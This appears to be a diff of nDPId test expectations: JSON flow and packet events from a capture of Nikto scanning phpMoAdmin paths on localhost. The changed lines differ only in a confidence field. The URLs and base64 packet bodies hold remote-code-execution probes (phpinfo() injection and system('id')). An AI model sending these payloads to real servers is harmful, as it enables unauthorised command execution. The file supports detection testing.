00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277976,"pkt":"AAAAAAAAAAAAAAAACABFAAFfD0hAAEAGLE9\/AAABfwAAAcfUH5ChoTYRo2DY7oAYAED\/UwAAAQEICp1nAACdZwAAR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} +01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277977,"pkt":"AAAAAAAAAAAAAAAACABFAAFqZD5AAEAG101\/AAABfwAAAcfWH5DMOF1rGOgpBIAYAED\/XgAAAQEICp1nAAGdZwABR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277980,"pkt":"AAAAAAAAAAAAAAAACABFAAFqHXJAAEAGHhp\/AAABfwAAAcfYH5AZXiQoPHeXDoAYAED\/XgAAAQEICp1nAASdZwAER0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277981,"pkt":"AAAAAAAAAAAAAAAACABFAAFn7phAAEAGTPZ\/AAABfwAAAcfaH5CzPtfCPnznp4AYAED\/WwAAAQEICp1nAAWdZwAFR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277983,"pkt":"AAAAAAAAAAAAAAAACABFAAFcKzdAAEAGEGN\/AAABfwAAAcfcH5CIchJjnARiwIAYAED\/UAAAAQEICp1nAAedZwAHR0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 
+01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7580000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277984,"pkt":"AAAAAAAAAAAAAAAACABFAAFfNJZAAEAGBwF\/AAABfwAAAcfeH5DptA3NjIJEK4AYAED\/UwAAAQEICp1nAAidZwAIR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} +01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277986,"pkt":"AAAAAAAAAAAAAAAACABFAAFn4zdAAEAGWFd\/AAABfwAAAcfgH5C+u9puvhX1U4AYAED\/WwAAAQEICp1nAAqdZwAKR0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 